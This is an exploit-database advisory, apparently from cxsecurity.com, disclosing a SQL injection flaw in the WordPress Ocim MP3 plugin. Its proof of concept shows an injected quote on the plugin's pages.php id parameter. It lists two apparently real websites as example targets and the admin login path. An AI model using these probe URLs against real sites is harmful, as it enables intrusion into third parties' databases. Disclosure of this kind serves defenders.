Wordpress Ocim MP3 Plugin SQL Injection Vulnerability

2016.02.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

======== Ocim MP3 Plugin SQL Injection Vulnerability ======== :----------------------------------------------------------------------------------------------------: : # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability : # Date : 26 February 2016 : # Author : xevil and Blankon33 : # Vendor Site: http://www.ocimscripts.com/ : # Vulnerability : SQL Injection : # Severity : High :----------------------------------------------------------------------------------------------------: Summary ======== Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress. Proof of Concept ======== Infected URL: http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi] Example: http://mp3onjuice.xyz/wp-content/plugins/ocim-mp3/source/pages.php?id=1' http://www.avmworld.com/wp-content/plugins/ocim-mp3/source/pages.php?id=1 --etc-- Admin Panel: http://[Site]/[Path]/oc-login.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2026, cxsecurity.com

 

Back to Top